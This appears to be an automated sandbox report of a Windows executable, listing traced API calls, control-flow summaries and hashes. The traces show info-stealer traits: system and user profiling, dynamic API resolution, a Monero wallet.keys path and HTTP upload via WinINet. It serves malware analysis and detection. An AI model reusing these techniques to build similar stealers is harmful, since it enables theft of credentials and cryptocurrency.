15191->15192 15830 2f7b00 GetUserDefaultLocaleName 15192->15830 15195 2fa9b0 4 API calls 15196 2f1f0e 15195->15196 15197 2fa8a0 lstrcpy 15196->15197 15198 2f1f17 15197->15198 15199 2fa9b0 4 API calls 15198->15199 15200 2f1f36 15199->15200 15201 2fa8a0 lstrcpy 15200->15201 15202 2f1f3f 15201->15202 15203 2fa9b0 4 API calls 15202->15203 15204 2f1f60 15203->15204 15205 2fa8a0 lstrcpy 15204->15205 15206 2f1f69 15205->15206 15834 2f7b90 15206->15834 15208 2f1f80 15209 2fa920 3 API calls 15208->15209 15210 2f1f93 15209->15210 15211 2fa8a0 lstrcpy 15210->15211 15212 2f1f9c 15211->15212 15213 2fa9b0 4 API calls 15212->15213 15214 2f1fc6 15213->15214 15215 2fa8a0 lstrcpy 15214->15215 15216 2f1fcf 15215->15216 15217 2fa9b0 4 API calls 15216->15217 15218 2f1fef 15217->15218 15219 2fa8a0 lstrcpy 15218->15219 15220 2f1ff8 15219->15220 15846 2f7d80 GetSystemPowerStatus 15220->15846 15223 2fa9b0 4 API calls 15224 2f2018 15223->15224 15225 2fa8a0 lstrcpy 15224->15225 15226 
2f2021 15225->15226 15227 2fa9b0 4 API calls 15226->15227 15228 2f2040 15227->15228 15229 2fa8a0 lstrcpy 15228->15229 15230 2f2049 15229->15230 15231 2fa9b0 4 API calls 15230->15231 15232 2f206a 15231->15232 15233 2fa8a0 lstrcpy 15232->15233 15234 2f2073 15233->15234 15235 2f207e GetCurrentProcessId 15234->15235 15848 2f9470 OpenProcess 15235->15848 15238 2fa920 3 API calls 15239 2f20a4 15238->15239 15240 2fa8a0 lstrcpy 15239->15240 15241 2f20ad 15240->15241 15242 2fa9b0 4 API calls 15241->15242 15243 2f20d7 15242->15243 15244 2fa8a0 lstrcpy 15243->15244 15245 2f20e0 15244->15245 15246 2fa9b0 4 API calls 15245->15246 15247 2f2100 15246->15247 15248 2fa8a0 lstrcpy 15247->15248 15249 2f2109 15248->15249 15853 2f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15249->15853 15252 2fa9b0 4 API calls 15253 2f2129 15252->15253 15254 2fa8a0 lstrcpy 15253->15254 15255 2f2132 15254->15255 15256 2fa9b0 4 API calls 15255->15256 15257 2f2151 15256->15257 15258 2fa8a0 lstrcpy 15257->15258 15259 2f215a 15258->15259 15260 2fa9b0 4 API calls 15259->15260 15261 2f217b 15260->15261 15262 2fa8a0 lstrcpy 15261->15262 15263 2f2184 15262->15263 15857 2f7f60 15263->15857 15266 2fa9b0 4 API calls 15267 2f21a4 15266->15267 15268 2fa8a0 lstrcpy 15267->15268 15269 2f21ad 15268->15269 15270 2fa9b0 4 API calls 15269->15270 15271 2f21cc 15270->15271 15272 2fa8a0 lstrcpy 15271->15272 15273 2f21d5 15272->15273 15274 2fa9b0 4 API calls 15273->15274 15275 2f21f6 15274->15275 15276 2fa8a0 lstrcpy 15275->15276 15277 2f21ff 15276->15277 15870 2f7ed0 GetSystemInfo wsprintfA 15277->15870 15280 2fa9b0 4 API calls 15281 2f221f 15280->15281 15282 2fa8a0 lstrcpy 15281->15282 15283 2f2228 15282->15283 15284 2fa9b0 4 API calls 15283->15284 15285 2f2247 15284->15285 15286 2fa8a0 lstrcpy 15285->15286 15287 2f2250 15286->15287 15288 2fa9b0 4 API calls 15287->15288 15289 2f2270 15288->15289 15290 2fa8a0 lstrcpy 15289->15290 15291 2f2279 15290->15291 15872 2f8100 GetProcessHeap RtlAllocateHeap 15291->15872 15294 

                  Control-flow Graph (function at 2f9860; graph rendering not reproduced, see APIs below)
                  APIs
                  • GetProcAddress.KERNEL32(75900000,01320798), ref: 002F98A1
                  • GetProcAddress.KERNEL32(75900000,013207B0), ref: 002F98BA
                  • GetProcAddress.KERNEL32(75900000,01320660), ref: 002F98D2
                  • GetProcAddress.KERNEL32(75900000,013206C0), ref: 002F98EA
                  • GetProcAddress.KERNEL32(75900000,01320810), ref: 002F9903
                  • GetProcAddress.KERNEL32(75900000,013289A0), ref: 002F991B
                  • GetProcAddress.KERNEL32(75900000,013166E0), ref: 002F9933
                  • GetProcAddress.KERNEL32(75900000,013166A0), ref: 002F994C
                  • GetProcAddress.KERNEL32(75900000,01320828), ref: 002F9964
                  • GetProcAddress.KERNEL32(75900000,013207C8), ref: 002F997C
                  • GetProcAddress.KERNEL32(75900000,01320840), ref: 002F9995
                  • GetProcAddress.KERNEL32(75900000,01320570), ref: 002F99AD
                  • GetProcAddress.KERNEL32(75900000,01316A20), ref: 002F99C5
                  • GetProcAddress.KERNEL32(75900000,013206D8), ref: 002F99DE
                  • GetProcAddress.KERNEL32(75900000,01320558), ref: 002F99F6
                  • GetProcAddress.KERNEL32(75900000,013168A0), ref: 002F9A0E
                  • GetProcAddress.KERNEL32(75900000,01320588), ref: 002F9A27
                  • GetProcAddress.KERNEL32(75900000,013208B8), ref: 002F9A3F
                  • GetProcAddress.KERNEL32(75900000,013168E0), ref: 002F9A57
                  • GetProcAddress.KERNEL32(75900000,013208A0), ref: 002F9A70
                  • GetProcAddress.KERNEL32(75900000,01316980), ref: 002F9A88
                  • LoadLibraryA.KERNEL32(01320918,?,002F6A00), ref: 002F9A9A
                  • LoadLibraryA.KERNEL32(01320888,?,002F6A00), ref: 002F9AAB
                  • LoadLibraryA.KERNEL32(013208D0,?,002F6A00), ref: 002F9ABD
                  • LoadLibraryA.KERNEL32(013208E8,?,002F6A00), ref: 002F9ACF
                  • LoadLibraryA.KERNEL32(01320900,?,002F6A00), ref: 002F9AE0
                  • GetProcAddress.KERNEL32(75070000,01320858), ref: 002F9B02
                  • GetProcAddress.KERNEL32(75FD0000,01320870), ref: 002F9B23
                  • GetProcAddress.KERNEL32(75FD0000,01328D60), ref: 002F9B3B
                  • GetProcAddress.KERNEL32(75A50000,01328C88), ref: 002F9B5D
                  • GetProcAddress.KERNEL32(74E50000,01316820), ref: 002F9B7E
                  • GetProcAddress.KERNEL32(76E80000,01328830), ref: 002F9B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 002F9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 002F9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 117fb8522f797b90a8de9bf53af7bcd302b2d15e87de664398eef77ed47e074f
                  • Instruction ID: 39216a478210e6dbc83d92199b840f5c85ef397e055d3f487192f8b257407370
                  • Opcode Fuzzy Hash: 117fb8522f797b90a8de9bf53af7bcd302b2d15e87de664398eef77ed47e074f
                  • Instruction Fuzzy Hash: 1FA182B55002409FD368EF68FE88A6637F9FF6E301708452AE605C3225D739A44BFB56

                  Control-flow Graph (function at 2e45c0; graph rendering not reproduced, see APIs below)
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 002E479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E45C7, 002E45D2, 002E45DD, 002E45E8, 002E45F3, 002E4617, 002E4622, 002E462D, 002E4638, 002E4643, 002E4657, 002E4662, 002E466D, 002E4678, 002E4683, 002E46AC, 002E46B7, 002E46C2, 002E46CD, 002E46D8, 002E4713, 002E471E, 002E4729, 002E4734, 002E473F, 002E474F, 002E475A, 002E4765, 002E4770, 002E477B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this same string, repeated and separated by '$')
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: dead8f4430503be1681f9af603bcbbc72235d5472bdef746680043e4560c0033
                  • Instruction ID: ecd6a28944c45def1800a647b67c366bb1fb44ad406fead3bb97e9507d248cc1
                  • Opcode Fuzzy Hash: dead8f4430503be1681f9af603bcbbc72235d5472bdef746680043e4560c0033
                  • Instruction Fuzzy Hash: 3541BD617F3684FAC629BBB4885EEDE3B165F42702F61D1C8EA23122C7CBB06504491B

                  Control-flow Graph (function at 2e4880; graph rendering not reproduced, see APIs below)
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002E4915
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00300DDB,00000000,?,?,00000000,?,",00000000,?,0132F300), ref: 002E4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002E4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002E4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002E4E49
                  • InternetCloseHandle.WININET(00000000), ref: 002E4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 002E4EC5
                  • HttpOpenRequestA.WININET(00000000,0132F2D0,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E4B15
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • InternetCloseHandle.WININET(00000000), ref: 002E4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 61c80be6dc7e0acc479703387d73f15affa9bfa582d30f877cdcbb0d8557604e
                  • Instruction ID: 357238d4c6b66167119d3c09de2ecefb7d09a38ed1ea33e06bd9bc90047ef5e2
                  • Opcode Fuzzy Hash: 61c80be6dc7e0acc479703387d73f15affa9bfa582d30f877cdcbb0d8557604e
                  • Instruction Fuzzy Hash: 2312CDB192111CAADB15EB50DD92FEEF378AF15780F5041B9B20A62091DFB02F59CF62
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002E11B7), ref: 002F7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 002F789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: cd4b4e4322c9a217f1b070b3910d457515ed1538d9790e71df0fafaccb2f83af
                  • Instruction ID: 7c649b083328a943a0a0c7b1156290c183245534b7b2ef2c7d52537bc06db7a7
                  • Opcode Fuzzy Hash: cd4b4e4322c9a217f1b070b3910d457515ed1538d9790e71df0fafaccb2f83af
                  • Instruction Fuzzy Hash: 62F04FB1944208ABC714DF98DD49FAEFBB8EB05751F10066AFA05A2680C77415058BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: b69bd3d45ab25c778ffc277f9c84f478c9bf042c664a1394368afc67190319b6
                  • Instruction ID: c5f4ae9c91402c89bf47084959eff6e30c0100c76911368827bd8e08a5f37c75
                  • Opcode Fuzzy Hash: b69bd3d45ab25c778ffc277f9c84f478c9bf042c664a1394368afc67190319b6
                  • Instruction Fuzzy Hash: 37D05E7490030CDBCB10DFE0DC496EDBB78FB19311F040554D90562340EA305496CAAA

                  Control-flow Graph

                  control_flow_graph 633 2f9c10-2f9c1a 634 2fa036-2fa0ca LoadLibraryA * 8 633->634 635 2f9c20-2fa031 GetProcAddress * 43 633->635 636 2fa0cc-2fa141 GetProcAddress * 5 634->636 637 2fa146-2fa14d 634->637 635->634 636->637 638 2fa216-2fa21d 637->638 639 2fa153-2fa211 GetProcAddress * 8 637->639 640 2fa21f-2fa293 GetProcAddress * 5 638->640 641 2fa298-2fa29f 638->641 639->638 640->641 642 2fa337-2fa33e 641->642 643 2fa2a5-2fa332 GetProcAddress * 6 641->643 644 2fa41f-2fa426 642->644 645 2fa344-2fa41a GetProcAddress * 9 642->645 643->642 646 2fa428-2fa49d GetProcAddress * 5 644->646 647 2fa4a2-2fa4a9 644->647 645->644 646->647 648 2fa4dc-2fa4e3 647->648 649 2fa4ab-2fa4d7 GetProcAddress * 2 647->649 650 2fa515-2fa51c 648->650 651 2fa4e5-2fa510 GetProcAddress * 2 648->651 649->648 652 2fa612-2fa619 650->652 653 2fa522-2fa60d GetProcAddress * 10 650->653 651->650 654 2fa67d-2fa684 652->654 655 2fa61b-2fa678 GetProcAddress * 4 652->655 653->652 656 2fa69e-2fa6a5 654->656 657 2fa686-2fa699 GetProcAddress 654->657 655->654 658 2fa708-2fa709 656->658 659 2fa6a7-2fa703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(75900000,013169A0), ref: 002F9C2D
                  • GetProcAddress.KERNEL32(75900000,01316700), ref: 002F9C45
                  • GetProcAddress.KERNEL32(75900000,01328F10), ref: 002F9C5E
                  • GetProcAddress.KERNEL32(75900000,01328FA0), ref: 002F9C76
                  • GetProcAddress.KERNEL32(75900000,0132D938), ref: 002F9C8E
                  • GetProcAddress.KERNEL32(75900000,0132DAD0), ref: 002F9CA7
                  • GetProcAddress.KERNEL32(75900000,0131B428), ref: 002F9CBF
                  • GetProcAddress.KERNEL32(75900000,0132D9C8), ref: 002F9CD7
                  • GetProcAddress.KERNEL32(75900000,0132D9F8), ref: 002F9CF0
                  • GetProcAddress.KERNEL32(75900000,0132D920), ref: 002F9D08
                  • GetProcAddress.KERNEL32(75900000,0132DAE8), ref: 002F9D20
                  • GetProcAddress.KERNEL32(75900000,01316840), ref: 002F9D39
                  • GetProcAddress.KERNEL32(75900000,013169E0), ref: 002F9D51
                  • GetProcAddress.KERNEL32(75900000,01316860), ref: 002F9D69
                  • GetProcAddress.KERNEL32(75900000,01316A00), ref: 002F9D82
                  • GetProcAddress.KERNEL32(75900000,0132DB18), ref: 002F9D9A
                  • GetProcAddress.KERNEL32(75900000,0132D950), ref: 002F9DB2
                  • GetProcAddress.KERNEL32(75900000,0131B450), ref: 002F9DCB
                  • GetProcAddress.KERNEL32(75900000,01316720), ref: 002F9DE3
                  • GetProcAddress.KERNEL32(75900000,0132D9B0), ref: 002F9DFB
                  • GetProcAddress.KERNEL32(75900000,0132DA58), ref: 002F9E14
                  • GetProcAddress.KERNEL32(75900000,0132D968), ref: 002F9E2C
                  • GetProcAddress.KERNEL32(75900000,0132D890), ref: 002F9E44
                  • GetProcAddress.KERNEL32(75900000,01316880), ref: 002F9E5D
                  • GetProcAddress.KERNEL32(75900000,0132D8C0), ref: 002F9E75
                  • GetProcAddress.KERNEL32(75900000,0132D980), ref: 002F9E8D
                  • GetProcAddress.KERNEL32(75900000,0132D8A8), ref: 002F9EA6
                  • GetProcAddress.KERNEL32(75900000,0132D908), ref: 002F9EBE
                  • GetProcAddress.KERNEL32(75900000,0132DB00), ref: 002F9ED6
                  • GetProcAddress.KERNEL32(75900000,0132D8D8), ref: 002F9EEF
                  • GetProcAddress.KERNEL32(75900000,0132D830), ref: 002F9F07
                  • GetProcAddress.KERNEL32(75900000,0132DA28), ref: 002F9F1F
                  • GetProcAddress.KERNEL32(75900000,0132D8F0), ref: 002F9F38
                  • GetProcAddress.KERNEL32(75900000,01329978), ref: 002F9F50
                  • GetProcAddress.KERNEL32(75900000,0132D848), ref: 002F9F68
                  • GetProcAddress.KERNEL32(75900000,0132D998), ref: 002F9F81
                  • GetProcAddress.KERNEL32(75900000,01316680), ref: 002F9F99
                  • GetProcAddress.KERNEL32(75900000,0132D860), ref: 002F9FB1
                  • GetProcAddress.KERNEL32(75900000,01316740), ref: 002F9FCA
                  • GetProcAddress.KERNEL32(75900000,0132D9E0), ref: 002F9FE2
                  • GetProcAddress.KERNEL32(75900000,0132D878), ref: 002F9FFA
                  • GetProcAddress.KERNEL32(75900000,013164C0), ref: 002FA013
                  • GetProcAddress.KERNEL32(75900000,01316660), ref: 002FA02B
                  • LoadLibraryA.KERNEL32(0132DA10,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA03D
                  • LoadLibraryA.KERNEL32(0132DA40,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA04E
                  • LoadLibraryA.KERNEL32(0132DA70,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA060
                  • LoadLibraryA.KERNEL32(0132DA88,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA072
                  • LoadLibraryA.KERNEL32(0132DAA0,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA083
                  • LoadLibraryA.KERNEL32(0132DAB8,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA095
                  • LoadLibraryA.KERNEL32(0132DE00,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA0A7
                  • LoadLibraryA.KERNEL32(0132DC80,?,002F5CA3,00300AEB,?,?,?,?,?,?,?,?,?,?,00300AEA,00300AE3), ref: 002FA0B8
                  • GetProcAddress.KERNEL32(75FD0000,013165C0), ref: 002FA0DA
                  • GetProcAddress.KERNEL32(75FD0000,0132DD58), ref: 002FA0F2
                  • GetProcAddress.KERNEL32(75FD0000,013288A0), ref: 002FA10A
                  • GetProcAddress.KERNEL32(75FD0000,0132DD40), ref: 002FA123
                  • GetProcAddress.KERNEL32(75FD0000,01316500), ref: 002FA13B
                  • GetProcAddress.KERNEL32(734B0000,0131B2C0), ref: 002FA160
                  • GetProcAddress.KERNEL32(734B0000,01316300), ref: 002FA179
                  • GetProcAddress.KERNEL32(734B0000,0131AED8), ref: 002FA191
                  • GetProcAddress.KERNEL32(734B0000,0132DDD0), ref: 002FA1A9
                  • GetProcAddress.KERNEL32(734B0000,0132DC98), ref: 002FA1C2
                  • GetProcAddress.KERNEL32(734B0000,01316380), ref: 002FA1DA
                  • GetProcAddress.KERNEL32(734B0000,013165E0), ref: 002FA1F2
                  • GetProcAddress.KERNEL32(734B0000,0132DBD8), ref: 002FA20B
                  • GetProcAddress.KERNEL32(763B0000,013162A0), ref: 002FA22C
                  • GetProcAddress.KERNEL32(763B0000,01316520), ref: 002FA244
                  • GetProcAddress.KERNEL32(763B0000,0132DB30), ref: 002FA25D
                  • GetProcAddress.KERNEL32(763B0000,0132DCC8), ref: 002FA275
                  • GetProcAddress.KERNEL32(763B0000,01316620), ref: 002FA28D
                  • GetProcAddress.KERNEL32(750F0000,0131B2E8), ref: 002FA2B3
                  • GetProcAddress.KERNEL32(750F0000,0131B298), ref: 002FA2CB
                  • GetProcAddress.KERNEL32(750F0000,0132DB78), ref: 002FA2E3
                  • GetProcAddress.KERNEL32(750F0000,01316540), ref: 002FA2FC
                  • GetProcAddress.KERNEL32(750F0000,01316560), ref: 002FA314
                  • GetProcAddress.KERNEL32(750F0000,0131B310), ref: 002FA32C
                  • GetProcAddress.KERNEL32(75A50000,0132DCE0), ref: 002FA352
                  • GetProcAddress.KERNEL32(75A50000,01316400), ref: 002FA36A
                  • GetProcAddress.KERNEL32(75A50000,01328930), ref: 002FA382
                  • GetProcAddress.KERNEL32(75A50000,0132DE18), ref: 002FA39B
                  • GetProcAddress.KERNEL32(75A50000,0132DC50), ref: 002FA3B3
                  • GetProcAddress.KERNEL32(75A50000,01316600), ref: 002FA3CB
                  • GetProcAddress.KERNEL32(75A50000,01316320), ref: 002FA3E4
                  • GetProcAddress.KERNEL32(75A50000,0132DB60), ref: 002FA3FC
                  • GetProcAddress.KERNEL32(75A50000,0132DCF8), ref: 002FA414
                  • GetProcAddress.KERNEL32(75070000,01316480), ref: 002FA436
                  • GetProcAddress.KERNEL32(75070000,0132DDE8), ref: 002FA44E
                  • GetProcAddress.KERNEL32(75070000,0132DCB0), ref: 002FA466
                  • GetProcAddress.KERNEL32(75070000,0132DB48), ref: 002FA47F
                  • GetProcAddress.KERNEL32(75070000,0132DB90), ref: 002FA497
                  • GetProcAddress.KERNEL32(74E50000,013162C0), ref: 002FA4B8
                  • GetProcAddress.KERNEL32(74E50000,01316360), ref: 002FA4D1
                  • GetProcAddress.KERNEL32(75320000,013162E0), ref: 002FA4F2
                  • GetProcAddress.KERNEL32(75320000,0132DD28), ref: 002FA50A
                  • GetProcAddress.KERNEL32(6F060000,01316640), ref: 002FA530
                  • GetProcAddress.KERNEL32(6F060000,013164A0), ref: 002FA548
                  • GetProcAddress.KERNEL32(6F060000,01316580), ref: 002FA560
                  • GetProcAddress.KERNEL32(6F060000,0132DBF0), ref: 002FA579
                  • GetProcAddress.KERNEL32(6F060000,01316280), ref: 002FA591
                  • GetProcAddress.KERNEL32(6F060000,013165A0), ref: 002FA5A9
                  • GetProcAddress.KERNEL32(6F060000,01316340), ref: 002FA5C2
                  • GetProcAddress.KERNEL32(6F060000,013163E0), ref: 002FA5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 002FA5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 002FA607
                  • GetProcAddress.KERNEL32(74E00000,0132DBA8), ref: 002FA629
                  • GetProcAddress.KERNEL32(74E00000,01328990), ref: 002FA641
                  • GetProcAddress.KERNEL32(74E00000,0132DBC0), ref: 002FA659
                  • GetProcAddress.KERNEL32(74E00000,0132DC08), ref: 002FA672
                  • GetProcAddress.KERNEL32(74DF0000,013164E0), ref: 002FA693
                  • GetProcAddress.KERNEL32(6F9C0000,0132DC20), ref: 002FA6B4
                  • GetProcAddress.KERNEL32(6F9C0000,01316420), ref: 002FA6CD
                  • GetProcAddress.KERNEL32(6F9C0000,0132DDB8), ref: 002FA6E5
                  • GetProcAddress.KERNEL32(6F9C0000,0132DD10), ref: 002FA6FD
                  Strings
                  Memory Dump Source
